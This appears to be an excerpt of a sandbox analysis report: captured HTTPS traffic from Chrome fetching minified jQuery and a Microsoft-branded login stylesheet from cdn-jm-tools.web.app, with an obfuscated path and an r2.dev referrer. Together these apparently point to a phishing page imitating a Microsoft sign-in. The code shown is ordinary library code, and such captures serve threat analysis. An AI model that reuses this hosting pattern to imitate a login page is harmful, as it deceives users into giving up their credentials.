2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d Data Ascii: (-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 Data Ascii: e},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];r
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4d 2b 22 2b 24 22 2c 22 67 22 29 2c 5f 3d Data Ascii: ]))'\|\"((?:\\\\.\|[^\\\\\"]))\"\|("+I+"))\|)"+M+"\\]",F=":("+I+")(?:\$(('((?:\\\\.\|[^\\\\']))'\|\"((?:\\\\.\|[^\\\\\"]))\")\|((?:\\\\.\|[^\\\\()[\\]]\|"+W+"))\|.)\$\|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+\|((?:^\|[^\\\\])(?:\\\\.))"+M+"+$","g"),_=
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4c 2e 61 70 70 6c 79 28 65 2c 4f 2e Data Ascii: ){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c Data Ascii: eturn r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 Data Ascii: r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 Data Ascii: id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e
2024-04-17 23:23:15 UTC	1369	IN	Data Raw: 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 Data Ascii: e","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"[^$\|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":di

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:15 UTC	629	OUT	GET /d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:15 UTC	607	IN	HTTP/1.1 200 OK Connection: close Content-Length: 102041 Cache-Control: max-age=3600 Content-Type: text/css; charset=utf-8 Etag: "180ed6b42ce49176e493ebf3f2145e670be96178b9e2f60001e81532e32268cb" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:15 GMT X-Served-By: cache-pdk-kfty2130033-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713396195.391191,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 Data Ascii: /! Copyright (C) Microsoft Corporation. All rights reserved. //*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projects listed
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 65 20 61 62 6f 76 65 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 6e 64 20 74 68 69 73 20 70 65 72 6d 69 73 73 69 6f 6e 20 6e 6f 74 69 63 65 20 73 68 61 6c 6c 20 62 65 20 69 6e 63 6c 75 64 65 64 20 69 6e 0a 61 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 0a 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 0a 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f Data Ascii: e above copyright notice and this permission notice shall be included inall copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES O
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 6c 20 62 65 20 69 6e 63 6c 75 64 65 64 20 69 6e 20 61 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 0a 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 20 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 Data Ascii: l be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 0a 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 20 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 0a 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46 52 4f 4d 2c 20 4f 55 54 20 4f 46 20 4f 52 20 49 4e 20 43 4f 4e 4e 45 43 54 49 4f 4e 0a 57 49 54 48 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 4f 52 20 54 48 45 20 55 53 45 20 4f 52 20 4f 54 48 45 52 20 44 45 41 4c 49 4e 47 53 20 49 4e 20 54 48 45 20 53 4f 46 54 57 41 52 45 2e 0a 2a 2f 0a 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 32 20 7c Data Ascii: COPYRIGHT HOLDERS BELIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTIONOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTIONWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.//! normalize.css v3.0.2 \|
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 62 75 74 74 6f 6e 5b 64 69 73 61 62 6c 65 64 5d 2c 68 74 6d 6c 20 69 6e 70 75 74 5b 64 69 73 61 62 6c 65 64 5d 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 69 6e 70 75 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 7b 62 6f 78 2d 73 69 7a Data Ascii: ut[type="submit"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type="checkbox"],input[type="radio"]{box-siz
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 3a 30 7d 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 61 63 74 69 76 65 2c 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 66 6f 63 75 73 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 77 69 64 74 68 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 63 6c 69 70 3a 61 75 74 6f 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 20 57 65 62 66 6f 6e 74 22 Data Ascii: ght:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}html{font-size:100%}body{font-family:"Segoe UI Webfont"
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 61 6c 2d 74 69 74 6c 65 5d 7b 63 75 72 73 6f 72 3a 68 65 6c 70 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 70 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 75 6c 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 6f 6c 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 73 6d 61 6c 6c 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 73 6d 61 6c 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 64 64 72 65 73 73 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 53 65 67 6f 65 20 55 49 20 57 65 62 66 6f 6e 74 27 3b 73 72 63 3a 6c 6f 63 61 Data Ascii: al-title]{cursor:help}blockquote p:last-child,blockquote ul:last-child,blockquote ol:last-child{margin-bottom:0}blockquote footer,blockquote small,blockquote .small{display:block}address{font-style:normal}@font-face{font-family:'Segoe UI Webfont';src:loca
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 74 3a 33 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 2e 33 36 32 38 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 2e 33 36 32 38 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 2e 33 36 32 38 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 2e 33 36 32 38 70 78 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 31 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 36 32 2e 37 32 35 36 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 39 32 30 33 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 Data Ascii: t:3.5rem;padding-bottom:3.3628px;padding-top:3.3628px;padding-bottom:3.3628px;padding-top:3.3628px}.text-header.text-maxlines-1,h1.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:62.7256px;max-height:3.92035rem}.text-header.text-maxli
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 30 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 36 30 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 37 39 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 38 38 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 35 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 Data Ascii: rap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.text-title.text-maxlines-2,h3.text-maxlines-2{max-height:60.7264px;max-height:3.7954rem}.text-title.text-maxlines-3,h3.text-maxlines-3{max-height:88.7264px;max-height:5.5454rem}.text-ti
2024-04-17 23:23:15 UTC	1378	IN	Data Raw: 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 38 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 36 34 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 37 35 72 Data Ascii: h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.text-caption.text-maxlines-4,h5.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.text-caption-alt,h6{font-size:10px;line-height:12px;font-weight:400;font-size:.625rem;line-height:.75r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
